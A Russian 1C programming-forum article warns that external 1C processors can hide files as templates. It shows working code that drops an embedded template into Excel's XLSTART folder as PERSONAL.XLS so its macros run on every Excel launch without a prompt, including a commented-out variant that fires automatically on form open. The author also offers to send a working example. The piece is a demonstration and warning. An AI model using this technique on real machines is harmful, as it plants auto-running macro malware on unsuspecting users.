Информационный поток
Задания вакансии материалы разработки сообщения форума
Рубрики статей и материалов
Яндекс-директ

Внимание! Будь осторожен - "макет" возможен.

  • Добавить свою публикацию
  • для этого требуется регистрация

Кто знаком с моими статьями:

"Троянский конь" или "скрытые" возможности таблиц 1С

"... Игра ПЯТНАШКИ в ДВЕ СТРОЧКИ ВСЕГО..." (для Вашей коллекции)

Как из 1С правильно УКАЗАТЬ MS EXCEL как нужно печатать документы !

Из 1С записать формулу в ячейке MS EXCEL

Нарушая запреты (Доступ к VBA из 1С)

и.т.д...

тот знает мой "интерес" к таким вещам.

В платформе 8.* есть очень интересная и полезная возможность сохранять в качестве макета посторонние файлы

(что в конфигурации, что в отдельно взятой внешней обработки)

Но и ОПАСНО ! Отсюда может "прилететь"

Давай на примере посмотрим код :

 

 

//************************Tatitutu (c) 2011 *************************************
 
Функция ПроверитьСуществованиеКаталога(ИмяКаталога) Экспорт
 
    КаталогНаДиске = Новый Файл(ИмяКаталога);
 
    Если КаталогНаДиске.Существует() Тогда
 
        Возврат Истина;
    Иначе
        Возврат Ложь;
    КонецЕсли;
КонецФункции
 
//************************Tatitutu (c) 2011 *************************************
 
// не стал активировать эту процедуру - все делайте сами :-),
//           чтобы потом на меня не ругались
//
//Процедура ПередОткрытием(Отказ, СтандартнаяОбработка)
//  Объект=ПолучитьМакет("Макет");
//  Для Сч=9 По 12 Цикл
//      ИмяНашегоМеста="C:\Program Files\Microsoft Office\OFFICE"+Строка(Сч)+"\XLSTART\";
//      Если ПроверитьСуществованиеКаталога(ИмяНашегоМеста) Тогда //
//          Объект.Записать(ИмяНашегоМеста+"PERSONAL.XLS");
//      КонецЕсли;
//  КонецЦикла;
//  Отказ=Истина;
//КонецПроцедуры
 
 
Процедура АйЯяЙНажатие(Элемент)
 
    Объект=ПолучитьМакет("Макет");
 
    Для Сч=9 По 12 Цикл
 
       ИмяНашегоМеста="C:\Program Files\Microsoft Office\OFFICE"+Строка(Сч)+"\XLSTART\";
 
       Если ПроверитьСуществованиеКаталога(ИмяНашегоМеста) Тогда
 
            Объект.Записать(ИмяНашегоМеста+"PERSONAL.XLS");
 
       КонецЕсли;
   КонецЦикла;
КонецПроцедуры
 
 //************************Tatitutu (c) 2011 *************************************
 
Процедура ВостановитьНажатие(Элемент)
 
    // Вставить содержимое обработчика.
 
    Для Сч=9 По 12 Цикл
 
       ИмяНашегоМеста="C:\Program Files\Microsoft Office\OFFICE"+Строка(Сч)+"\XLSTART\";
 
       Попытка
 
          УдалитьФайлы(ИмяНашегоМеста+"PERSONAL.XLS");
 
       Исключение
 
       КонецПопытки;
   КонецЦикла;
КонецПроцедуры

 

 


Вроде ничего страшного, но это ТРОЯНСКИЙ КОНЬ

 

для тех кто не знает - файл PERSONAL.XLS - это общая книга макросов для приложения Microsoft Office Excel  (для Microsoft Office Word файл называется NORMAL.DOT)

 

Что он делает ? Вы не знаете ???

Тогда лучше вам покинуть данную статью.

С "помощью этого файла" разве что яичницу на мониторе нельзя приготовить, а в остальном - простор для фантазии.

(можно настроить на дату, на событие, на результат и.т.д)

И все макросы будут выполнятся без вопросов "выполнить или нет"

И заметьте 1С вроде как бы не причем.

Код написан самый простой - только для примера.

 

Закройте EXCEL и нажмите кнопку "Востановить EXCEL" - результаты примера удалены и больше вас не побеспокоят.

Еще раз повторяю - это самый наипростейший пример, только пример .

На то и щука, чтобы карась не дремал (с) Народная мудрость.

 

Будьте внимательны когда запускаете незнакомые обработки

а если уж запустили - знайте где примерно искать.


Кому интересно будет - пишите пришлю рабочий пример.


На последок случай из жизни

давно только когда начали появляться компьютеры

и пользователи услашали об макровирусах....


три строчки кода, но какой эффект

все ЗАПЯТЫЕ при ПЕЧАТИ ЛЮБОГО ДОКУМЕНТА менются на нехорошее слово - моментально.

 
0
Читайте также
Программирование 1с
Процесс обучения 1С программированию подразумевает приобретение навыков настройки программ под нужды заказчика.
Полезные мелочи
У программистов, занимающихся разработкой программного кода есть свой набор заготовок и решений, которые используются им и значительно облегчают дальнейшую работу
Разработки
Программа для фрилансеров
В программе много отчетов, которые позволяют отслеживать состояние текущих дел
Распаковка защищенных модулей 1С 8
Обработка 1С 8 по распаковке защищенных модулей
Обработка заполнение табличных частей документа. Написана для конфигурации УТ 11.0.6.9. Загружает информацию из файла Excel печа
Для конфигурации УТ 11.0.6.9 написана обработка для заполнения документа из файла Excel
Еще от автора
≡ к списку статей